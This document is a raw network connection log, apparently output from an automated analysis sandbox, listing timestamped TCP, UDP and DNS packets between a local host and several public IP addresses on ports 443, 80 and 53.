                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.776325941 CET44349717162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.981237888 CET49717443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.981347084 CET44349717162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.981530905 CET49717443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.029915094 CET44349713185.172.148.132192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.029942036 CET44349713185.172.148.132192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.030013084 CET49713443192.168.2.6185.172.148.132
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.030031919 CET44349713185.172.148.132192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.031900883 CET49713443192.168.2.6185.172.148.132
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.031963110 CET44349713185.172.148.132192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.032017946 CET49713443192.168.2.6185.172.148.132
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143351078 CET49724443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143420935 CET49719443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143479109 CET49720443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143513918 CET49721443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143549919 CET49722443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.143591881 CET49723443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.144193888 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.144231081 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.144277096 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.144675970 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.144689083 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184324026 CET44349723172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184326887 CET44349722172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184328079 CET44349721172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184334993 CET44349719172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184341908 CET44349720172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.184341908 CET4434972423.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.370045900 CET44349719172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.370105028 CET49719443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.400142908 CET44349720172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.400197983 CET49720443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.612003088 CET44349722172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.612051010 CET49722443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.626157999 CET44349721172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.626215935 CET49721443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.838246107 CET44349723172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:17.838313103 CET49723443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:18.125401020 CET4434972423.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:18.125533104 CET4434972423.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:18.125566959 CET49724443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:18.126825094 CET49724443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.192190886 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.192533970 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.192554951 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.192980051 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.195101976 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.195183039 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.195451021 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.240326881 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.790590048 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.790664911 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.790954113 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.791148901 CET49728443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.791168928 CET4434972823.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.972992897 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.973017931 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.973094940 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.973959923 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.973994017 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.974129915 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.979664087 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.979681015 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.979784966 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.979798079 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.290658951 CET49678443192.168.2.620.42.65.91
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.867486000 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.867832899 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.867860079 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.869030952 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.869096041 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.870362043 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.870433092 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.884145021 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.884494066 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.884504080 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.884855032 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.885246992 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.885302067 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.915585995 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.915611029 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.931252003 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:21.965867996 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.679162979 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.679284096 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.679362059 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.686065912 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.686130047 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:32.686206102 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.251074076 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.256222010 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.256373882 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.256373882 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.261446953 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.893840075 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.901551962 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:42.906727076 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:43.087176085 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:43.138650894 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:08.388135910 CET49732443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:08.388170958 CET44349732162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:08.388196945 CET49731443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:08.388228893 CET44349731162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.408421993 CET5026053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.413549900 CET53502601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.413671017 CET5026053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.418807983 CET53502601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.683090925 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.683146954 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.683228016 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.683485031 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.683500051 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.922753096 CET5026053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.928086042 CET53502601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:12.928433895 CET5026053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.018294096 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.018335104 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.021220922 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.021464109 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:13.021481991 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.014715910 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.014765024 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.014828920 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.014998913 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015055895 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015109062 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015209913 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015228033 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015347958 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.015363932 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.561151028 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.561652899 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.561681032 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.562066078 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.562385082 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.562462091 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.562527895 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:14.604327917 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.056272030 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.056572914 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.056592941 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.057704926 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.057774067 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.059120893 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.059216022 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.111279964 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.111299038 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.155364037 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.160172939 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.160254002 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.160367966 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.160626888 CET50261443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.160649061 CET4435026123.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.161283970 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.161336899 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.163491011 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.163647890 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.163674116 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.882517099 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.883006096 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.883034945 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.884453058 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.884529114 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.885883093 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.886002064 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.887280941 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.887485981 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.887514114 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.887885094 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.888159037 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.888227940 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.931709051 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.931715965 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.931749105 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:15.978156090 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.087313890 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.087610006 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.087631941 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.087985992 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.088752985 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.088841915 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.088912010 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.132324934 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.135729074 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.683264971 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.683351040 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.683485031 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.683695078 CET50266443192.168.2.623.40.179.56
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:17.683717966 CET4435026623.40.179.56192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.427865982 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.427953959 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.428040028 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.457195044 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.457288027 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:25.457463026 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:30.301919937 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:30.301995039 CET4435026323.57.90.163192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:30.302047968 CET50263443192.168.2.623.57.90.163
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:43.400576115 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:43.405982971 CET8049744142.250.181.227192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:41:43.406099081 CET4974480192.168.2.6142.250.181.227
                                                                                                                                                                                                                                                            Mar 7, 2025 21:42:10.431907892 CET50264443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:42:10.431950092 CET4435026468.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:42:10.463896990 CET50265443192.168.2.668.70.205.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:42:10.463932037 CET4435026568.70.205.3192.168.2.6
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.378036976 CET5118953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:03.390443087 CET53511891.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.934250116 CET6284653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.934431076 CET6267753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965178013 CET53628461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:08.965195894 CET53626771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.468825102 CET4932353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469073057 CET5660353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469371080 CET4955353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.469615936 CET6307953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476507902 CET53493231.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476752996 CET53566031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.476763964 CET53495531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.477230072 CET53630791.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.499445915 CET6538653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.499849081 CET5636153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.506556034 CET53653861.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.508052111 CET53563611.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.545586109 CET6517753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.545758963 CET6166453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.552663088 CET53651771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.553546906 CET53616641.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.675025940 CET6048953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.675198078 CET5701753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.682665110 CET53570171.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:12.683876991 CET53604891.1.1.1192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:15.599584103 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:15.901376009 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.080765963 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.081180096 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.081192970 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.081940889 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.083198071 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.083395958 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.084265947 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.084553003 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.084682941 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.084682941 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.084955931 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.085176945 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184118986 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184231997 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184241056 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184250116 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184266090 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.184823036 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.185000896 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.187860012 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.189266920 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.189975977 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.190248966 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.190685987 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.192086935 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.192325115 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.192795992 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.202830076 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.203124046 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.285679102 CET44352145172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:16.327254057 CET52145443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.969847918 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.972593069 CET62908443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.973639965 CET53449443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                            Mar 7, 2025 21:40:19.975089073 CET53449443192.168.2.6172.64.41.3
